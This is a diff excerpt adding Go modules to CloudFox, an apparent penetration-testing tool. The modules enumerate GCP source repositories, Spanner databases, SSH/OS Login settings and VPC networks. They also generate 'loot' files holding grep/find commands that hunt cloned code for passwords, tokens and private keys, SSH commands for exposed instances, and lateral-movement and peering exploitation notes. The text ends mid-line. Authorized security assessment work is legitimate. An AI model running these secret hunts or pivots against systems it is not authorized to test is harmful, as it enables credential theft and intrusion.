serviceCounts[agent.ServiceName]++ + } + + summaryHeader := []string{ + "Service", + "Count", + } + + var summaryBody [][]string + for service, count := range serviceCounts { + summaryBody = append(summaryBody, []string{ + service, + fmt.Sprintf("%d", count), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "service-agents", + Header: header, + Body: body, + }, + } + + if len(summaryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "service-agents-summary", + Header: summaryHeader, + Body: summaryBody, + }) + } + + output := ServiceAgentsOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go new file mode 100644 index 00000000..4c27e2e5 --- /dev/null +++ b/gcp/commands/sourcerepos.go @@ -0,0 +1,252 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSourceReposCommand = &cobra.Command{ + Use: globals.GCP_SOURCEREPOS_MODULE_NAME, + Aliases: []string{"repos", "csr", "git"}, + Short: "Enumerate Cloud Source Repositories", + Long: `Enumerate Cloud Source Repositories for code and secrets. + +Cloud Source Repositories can contain: +- Application source code +- Infrastructure as Code (Terraform, CloudFormation) +- Configuration files with hardcoded credentials +- API keys and secrets in code +- CI/CD pipeline configurations + +Output: +- List of all repositories accessible +- Repository sizes and mirror configurations +- Clone commands for each repository +- Secret search commands + +After cloning, search for: +- Hardcoded credentials and API keys +- Private keys and certificates +- Environment configuration files +- Database connection strings`, + Run: runGCPSourceReposCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SourceReposModule struct { + gcpinternal.BaseGCPModule + + Repos []sourcereposservice.RepoInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SourceReposOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SourceReposOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SourceReposOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SOURCEREPOS_MODULE_NAME) + if err != nil { + return + } + + module := &SourceReposModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Repos: []sourcereposservice.RepoInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SourceReposModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SOURCEREPOS_MODULE_NAME, m.processProject) + + if len(m.Repos) == 0 { + logger.InfoM("No Cloud Source Repositories found", globals.GCP_SOURCEREPOS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(m.Repos)), globals.GCP_SOURCEREPOS_MODULE_NAME) + logger.InfoM("[PENTEST] Clone repositories and search for secrets!", globals.GCP_SOURCEREPOS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SourceReposModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Source Repositories in project: %s", projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list repos in project %s: %v", projectID, err), globals.GCP_SOURCEREPOS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Repos = append(m.Repos, repos...) + + for _, repo := range repos { + m.addRepoToLoot(repo) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) in project %s", len(repos), projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SourceReposModule) initializeLootFiles() { + m.LootMap["source-repos-clone"] = &internal.LootFile{ + Name: "source-repos-clone", + Contents: "# Cloud Source Repository Clone Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["source-repos-secrets-search"] = &internal.LootFile{ + Name: "source-repos-secrets-search", + Contents: "# Search Cloned Repos for Secrets\n# Generated by CloudFox\n# Run after cloning repositories\n\n", + } +} + +func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { + // Clone commands + m.LootMap["source-repos-clone"].Contents += fmt.Sprintf( + "# Repository: %s (Project: %s)\n", + repo.Name, repo.ProjectID, + ) + if repo.Size > 0 { + m.LootMap["source-repos-clone"].Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + } + if repo.MirrorConfig { + m.LootMap["source-repos-clone"].Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + } + m.LootMap["source-repos-clone"].Contents += fmt.Sprintf( + "gcloud source repos clone %s --project=%s\n\n", + repo.Name, repo.ProjectID, + ) + + // Secret search commands + m.LootMap["source-repos-secrets-search"].Contents += fmt.Sprintf( + "# Search %s for secrets:\n"+ + "cd %s\n"+ + "grep -rE '(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ + "find . -name '*.pem' -o -name '*.key' -o -name '.env*' -o -name '*credential*' -o -name '*.tfvars'\n"+ + "grep -rE 'BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY' .\n\n", + repo.Name, repo.Name, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Repos table + header := []string{ + "Name", + "Size", + "Mirror", + "Triggers", + "Risk", + "Project", + } + + var body [][]string + for _, repo := range m.Repos { + sizeDisplay := "-" + if repo.Size > 0 { + if repo.Size > 1024*1024 { + sizeDisplay = fmt.Sprintf("%.1f MB", float64(repo.Size)/(1024*1024)) + } else if repo.Size > 1024 { + sizeDisplay = fmt.Sprintf("%.1f KB", float64(repo.Size)/1024) + } else { + sizeDisplay = fmt.Sprintf("%d B", repo.Size) + } + } + + mirror := "No" + if repo.MirrorConfig { + mirror = "Yes" + } + + body = append(body, []string{ + repo.Name, + sizeDisplay, + mirror, + fmt.Sprintf("%d", repo.PubsubConfigs), + repo.RiskLevel, + repo.ProjectID, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "source-repos", + Header: header, + Body: body, + }, + } + + output := SourceReposOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go new file mode 100644 index 00000000..496a08d5 --- /dev/null +++ b/gcp/commands/spanner.go @@ -0,0 +1,135 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerCommand = &cobra.Command{ + Use: globals.GCP_SPANNER_MODULE_NAME, + Aliases: []string{"cloud-spanner"}, + Short: "Enumerate Cloud Spanner instances and databases", + Long: `Enumerate Cloud Spanner instances and their databases.`, + Run: runGCPSpannerCommand, +} + +type SpannerModule struct { + gcpinternal.BaseGCPModule + Instances []spannerservice.SpannerInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type SpannerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNER_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []spannerservice.SpannerInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNER_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Spanner instances found", globals.GCP_SPANNER_MODULE_NAME) + return + } + + dbCount := 0 + for _, instance := range m.Instances { + dbCount += len(instance.Databases) + } + + logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", + len(m.Instances), dbCount), globals.GCP_SPANNER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + svc := spannerservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Spanner instances: %v", err), globals.GCP_SPANNER_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() +} + +func (m *SpannerModule) initializeLootFiles() { + m.LootMap["spanner-instances"] = &internal.LootFile{ + Name: "spanner-instances", + Contents: "# Spanner Instances and Databases\n# Generated by CloudFox\n\n", + } +} + +func (m *SpannerModule) addToLoot(instance spannerservice.SpannerInstanceInfo) { + m.LootMap["spanner-instances"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n# Databases: %s\n# Nodes: %d\n\n", + instance.Name, instance.DisplayName, + strings.Join(instance.Databases, ", "), + instance.NodeCount) +} + +func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{"Name", "Display Name", "Config", "Nodes", "Databases", "State", "Project"} + + var body [][]string + for _, instance := range m.Instances { + body = append(body, []string{ + instance.Name, + instance.DisplayName, + instance.Config, + fmt.Sprintf("%d", instance.NodeCount), + strings.Join(instance.Databases, ", "), + instance.State, + instance.ProjectID, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := SpannerOutput{ + Table: []internal.TableFile{{Name: "spanner", Header: header, Body: body}}, + Loot: lootFiles, + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) +} diff --git a/gcp/commands/sshoslogin.go b/gcp/commands/sshoslogin.go new file mode 100644 index 00000000..aa21df21 --- /dev/null +++ b/gcp/commands/sshoslogin.go @@ -0,0 +1,378 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + sshosloginservice "github.com/BishopFox/cloudfox/gcp/services/sshOsLoginService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSSHOsLoginCommand = &cobra.Command{ + Use: globals.GCP_SSHOSLOGIN_MODULE_NAME, + Aliases: []string{"ssh", "oslogin", "ssh-keys"}, + Short: "Enumerate SSH access and OS Login configuration", + Long: `Enumerate SSH access configuration across projects and instances. + +This module identifies: +- OS Login configuration (project and instance level) +- SSH keys in project metadata (accessible to all instances) +- SSH keys in instance metadata +- Instances accessible via SSH +- 2FA requirements for OS Login + +Security Analysis: +- Legacy SSH keys vs OS Login +- Project-wide SSH key exposure +- External IP + SSH access combinations +- Missing 2FA for OS Login + +Output: +- OS Login configuration per project +- SSH keys from metadata +- Instance SSH access details +- SSH commands for accessible instances`, + Run: runGCPSSHOsLoginCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SSHOsLoginModule struct { + gcpinternal.BaseGCPModule + + OSLoginConfigs []sshosloginservice.OSLoginConfig + SSHKeys []sshosloginservice.SSHKeyInfo + InstanceAccess []sshosloginservice.InstanceSSHAccess + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SSHOsLoginOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SSHOsLoginOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SSHOsLoginOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSSHOsLoginCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SSHOSLOGIN_MODULE_NAME) + if err != nil { + return + } + + module := &SSHOsLoginModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OSLoginConfigs: []sshosloginservice.OSLoginConfig{}, + SSHKeys: []sshosloginservice.SSHKeyInfo{}, + InstanceAccess: []sshosloginservice.InstanceSSHAccess{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SSHOsLoginModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SSHOSLOGIN_MODULE_NAME, m.processProject) + + if len(m.InstanceAccess) == 0 && len(m.SSHKeys) == 0 { + logger.InfoM("No SSH access information found", globals.GCP_SSHOSLOGIN_MODULE_NAME) + return + } + + // Count instances with external IPs + externalCount := 0 + for _, access := range m.InstanceAccess { + if access.ExternalIP != "" { + externalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d SSH key(s), %d with external IPs", + len(m.InstanceAccess), len(m.SSHKeys), externalCount), globals.GCP_SSHOSLOGIN_MODULE_NAME) + + if len(m.SSHKeys) > 0 { + logger.InfoM("[PENTEST] SSH keys found in metadata - check for access!", globals.GCP_SSHOSLOGIN_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SSHOsLoginModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating SSH/OS Login in project: %s", projectID), globals.GCP_SSHOSLOGIN_MODULE_NAME) + } + + svc := sshosloginservice.New() + + // Get OS Login config + config, err := svc.GetProjectOSLoginConfig(projectID) + if err == nil && config != nil { + m.mu.Lock() + m.OSLoginConfigs = append(m.OSLoginConfigs, *config) + m.mu.Unlock() + } + + // Get project SSH keys + projectKeys, err := svc.GetProjectSSHKeys(projectID) + if err == nil { + m.mu.Lock() + m.SSHKeys = append(m.SSHKeys, projectKeys...) + for _, key := range projectKeys { + m.addSSHKeyToLoot(key) + } + m.mu.Unlock() + } + + // Get instance SSH access + instances, instanceKeys, err := svc.GetInstanceSSHAccess(projectID) + if err == nil { + m.mu.Lock() + m.InstanceAccess = append(m.InstanceAccess, instances...) + m.SSHKeys = append(m.SSHKeys, instanceKeys...) + + for _, access := range instances { + m.addInstanceAccessToLoot(access) + } + for _, key := range instanceKeys { + m.addSSHKeyToLoot(key) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s), %d SSH key(s) in project %s", + len(instances), len(projectKeys)+len(instanceKeys), projectID), globals.GCP_SSHOSLOGIN_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SSHOsLoginModule) initializeLootFiles() { + m.LootMap["ssh-commands"] = &internal.LootFile{ + Name: "ssh-commands", + Contents: "# SSH Commands for Instances\n# Generated by CloudFox\n\n", + } + m.LootMap["ssh-keys-found"] = &internal.LootFile{ + Name: "ssh-keys-found", + Contents: "# SSH Keys Found in Metadata\n# Generated by CloudFox\n# These keys grant access to instances\n\n", + } + m.LootMap["ssh-external-access"] = &internal.LootFile{ + Name: "ssh-external-access", + Contents: "# Instances with External SSH Access\n# Generated by CloudFox\n# Direct SSH targets from internet\n\n", + } +} + +func (m *SSHOsLoginModule) addSSHKeyToLoot(key sshosloginservice.SSHKeyInfo) { + source := "Project-wide" + if key.Source == "instance" { + source = fmt.Sprintf("Instance: %s", key.InstanceName) + } + + m.LootMap["ssh-keys-found"].Contents += fmt.Sprintf( + "## User: %s\n"+ + "## Key Type: %s\n"+ + "## Source: %s\n"+ + "## Project: %s\n", + key.Username, key.KeyType, source, key.ProjectID, + ) + + for _, cmd := range key.ExploitCommands { + m.LootMap["ssh-keys-found"].Contents += cmd + "\n" + } + m.LootMap["ssh-keys-found"].Contents += "\n" +} + +func (m *SSHOsLoginModule) addInstanceAccessToLoot(access sshosloginservice.InstanceSSHAccess) { + // SSH commands for all instances + m.LootMap["ssh-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s)\n", + access.InstanceName, access.ProjectID, + ) + for _, cmd := range access.SSHCommands { + m.LootMap["ssh-commands"].Contents += cmd + "\n" + } + m.LootMap["ssh-commands"].Contents += "\n" + + // External access specifically + if access.ExternalIP != "" { + m.LootMap["ssh-external-access"].Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## External IP: %s\n"+ + "## Project: %s, Zone: %s\n"+ + "## OS Login: %v, Block Project Keys: %v\n", + access.RiskLevel, access.InstanceName, + access.ExternalIP, + access.ProjectID, access.Zone, + access.OSLoginEnabled, access.BlockProjectKeys, + ) + + if len(access.RiskReasons) > 0 { + for _, reason := range access.RiskReasons { + m.LootMap["ssh-external-access"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + + m.LootMap["ssh-external-access"].Contents += fmt.Sprintf( + "gcloud compute ssh %s --zone=%s --project=%s\n\n", + access.InstanceName, access.Zone, access.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // OS Login Config table + if len(m.OSLoginConfigs) > 0 { + configHeader := []string{ + "Project", + "OS Login", + "2FA Required", + "Block Project Keys", + "Risk", + } + + var configBody [][]string + for _, config := range m.OSLoginConfigs { + configBody = append(configBody, []string{ + config.ProjectID, + boolToYesNo(config.OSLoginEnabled), + boolToYesNo(config.OSLogin2FAEnabled), + boolToYesNo(config.BlockProjectSSHKeys), + config.RiskLevel, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "oslogin-config", + Header: configHeader, + Body: configBody, + }) + } + + // Instance SSH Access table + if len(m.InstanceAccess) > 0 { + accessHeader := []string{ + "Instance", + "External IP", + "Internal IP", + "OS Login", + "SSH Keys", + "Risk", + "Zone", + "Project", + } + + var accessBody [][]string + for _, access := range m.InstanceAccess { + externalIP := access.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + accessBody = append(accessBody, []string{ + access.InstanceName, + externalIP, + access.InternalIP, + boolToYesNo(access.OSLoginEnabled), + fmt.Sprintf("%d", access.SSHKeysCount), + access.RiskLevel, + access.Zone, + access.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "ssh-instance-access", + Header: accessHeader, + Body: accessBody, + }) + } + + // SSH Keys table + if len(m.SSHKeys) > 0 { + keysHeader := []string{ + "Username", + "Key Type", + "Source", + "Instance", + "Project", + } + + var keysBody [][]string + for _, key := range m.SSHKeys { + instance := "-" + if key.InstanceName != "" { + instance = key.InstanceName + } + + keysBody = append(keysBody, []string{ + key.Username, + key.KeyType, + key.Source, + instance, + key.ProjectID, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "ssh-keys", + Header: keysHeader, + Body: keysBody, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := SSHOsLoginOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SSHOSLOGIN_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go new file mode 100644 index 00000000..9b3084e6 --- /dev/null +++ b/gcp/commands/vpcnetworks.go @@ -0,0 +1,328 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + vpcservice "github.com/BishopFox/cloudfox/gcp/services/vpcService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPVPCNetworksCommand = &cobra.Command{ + Use: globals.GCP_VPCNETWORKS_MODULE_NAME, + Aliases: []string{"vpc", "networks", "net"}, + Short: "Enumerate VPC Networks", + Long: `Enumerate VPC Networks and related configurations. + +Features: +- Lists all VPC networks and subnets +- Shows VPC peering connections +- Analyzes routing tables +- Checks for Private Google Access +- Identifies flow log configuration`, + Run: runGCPVPCNetworksCommand, +} + +type VPCNetworksModule struct { + gcpinternal.BaseGCPModule + Networks []vpcservice.VPCNetworkInfo + Subnets []vpcservice.SubnetInfo + Peerings []vpcservice.VPCPeeringInfo + Routes []vpcservice.RouteInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCNetworksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCNetworksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCNetworksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCNetworksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCNETWORKS_MODULE_NAME) + if err != nil { + return + } + + module := &VPCNetworksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []vpcservice.VPCNetworkInfo{}, + Subnets: []vpcservice.SubnetInfo{}, + Peerings: []vpcservice.VPCPeeringInfo{}, + Routes: []vpcservice.RouteInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCNetworksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_VPCNETWORKS_MODULE_NAME, m.processProject) + + if len(m.Networks) == 0 { + logger.InfoM("No VPC networks found", globals.GCP_VPCNETWORKS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d route(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.Routes)), globals.GCP_VPCNETWORKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating VPC networks in project: %s", projectID), globals.GCP_VPCNETWORKS_MODULE_NAME) + } + + svc := vpcservice.New() + + // Get networks + networks, err := svc.ListVPCNetworks(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list VPC networks: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Networks = append(m.Networks, networks...) + m.mu.Unlock() + } + + // Get subnets + subnets, err := svc.ListSubnets(projectID) + if err == nil { + m.mu.Lock() + m.Subnets = append(m.Subnets, subnets...) + m.mu.Unlock() + } + + // Get peerings + peerings, err := svc.ListVPCPeerings(projectID) + if err == nil { + m.mu.Lock() + m.Peerings = append(m.Peerings, peerings...) + m.mu.Unlock() + } + + // Get routes + routes, err := svc.ListRoutes(projectID) + if err == nil { + m.mu.Lock() + m.Routes = append(m.Routes, routes...) + m.mu.Unlock() + } + + m.mu.Lock() + for _, network := range networks { + m.addNetworkToLoot(network) + } + for _, subnet := range subnets { + m.addSubnetToLoot(subnet) + } + for _, peering := range peerings { + m.addPeeringToLoot(peering) + } + m.mu.Unlock() +} + +func (m *VPCNetworksModule) initializeLootFiles() { + m.LootMap["vpc-networks"] = &internal.LootFile{ + Name: "vpc-networks", + Contents: "# VPC Networks\n# Generated by CloudFox\n\n", + } + m.LootMap["subnet-cidrs"] = &internal.LootFile{ + Name: "subnet-cidrs", + Contents: "", + } + m.LootMap["vpc-lateral-movement"] = &internal.LootFile{ + Name: "vpc-lateral-movement", + Contents: "# VPC Lateral Movement Paths\n# Generated by CloudFox\n# Cross-project VPC peerings for network pivoting\n\n", + } + m.LootMap["vpc-peering-commands"] = &internal.LootFile{ + Name: "vpc-peering-commands", + Contents: "# VPC Peering Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCNetworksModule) addNetworkToLoot(network vpcservice.VPCNetworkInfo) { + m.LootMap["vpc-networks"].Contents += fmt.Sprintf( + "# Network: %s\n# Routing: %s\n# Subnets: %d\n# Peerings: %d\n\n", + network.Name, network.RoutingMode, len(network.Subnetworks), len(network.Peerings)) +} + +func (m *VPCNetworksModule) addSubnetToLoot(subnet vpcservice.SubnetInfo) { + m.LootMap["subnet-cidrs"].Contents += fmt.Sprintf("%s # %s/%s\n", + subnet.IPCidrRange, subnet.Network, subnet.Name) +} + +func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) { + // Add lateral movement paths + if peering.LateralMovementPath { + m.LootMap["vpc-lateral-movement"].Contents += fmt.Sprintf( + "## [%s] %s -> %s\n"+ + "## Source Project: %s\n"+ + "## Target Project: %s\n"+ + "## State: %s\n", + peering.RiskLevel, peering.Network, peering.PeerNetwork, + peering.ProjectID, peering.PeerProjectID, + peering.State, + ) + for _, reason := range peering.RiskReasons { + m.LootMap["vpc-lateral-movement"].Contents += fmt.Sprintf("## - %s\n", reason) + } + m.LootMap["vpc-lateral-movement"].Contents += "\n" + } + + // Add exploitation commands + if len(peering.ExploitCommands) > 0 { + m.LootMap["vpc-peering-commands"].Contents += fmt.Sprintf( + "## [%s] Peering: %s (Project: %s)\n", + peering.RiskLevel, peering.Name, peering.ProjectID, + ) + for _, cmd := range peering.ExploitCommands { + m.LootMap["vpc-peering-commands"].Contents += cmd + "\n" + } + m.LootMap["vpc-peering-commands"].Contents += "\n" + } +} + +func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Networks table + netHeader := []string{"Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings", "Risk", "Project"} + var netBody [][]string + for _, network := range m.Networks { + autoSubnets := "No" + if network.AutoCreateSubnetworks { + autoSubnets = "Yes" + } + netBody = append(netBody, []string{ + network.Name, + network.RoutingMode, + autoSubnets, + fmt.Sprintf("%d", len(network.Subnetworks)), + fmt.Sprintf("%d", len(network.Peerings)), + network.RiskLevel, + network.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: netHeader, + Body: netBody, + }) + + // Subnets table + if len(m.Subnets) > 0 { + subHeader := []string{"Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs", "Risk", "Project"} + var subBody [][]string + for _, subnet := range m.Subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" + } + flowLogs := "No" + if subnet.EnableFlowLogs { + flowLogs = "Yes" + } + subBody = append(subBody, []string{ + subnet.Name, + subnet.Network, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + flowLogs, + subnet.RiskLevel, + subnet.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: subHeader, + Body: subBody, + }) + } + + // Peerings table + if len(m.Peerings) > 0 { + peerHeader := []string{"Name", "Network", "Peer Network", "Peer Project", "State", "Lateral Move", "Risk", "Project"} + var peerBody [][]string + for _, peering := range 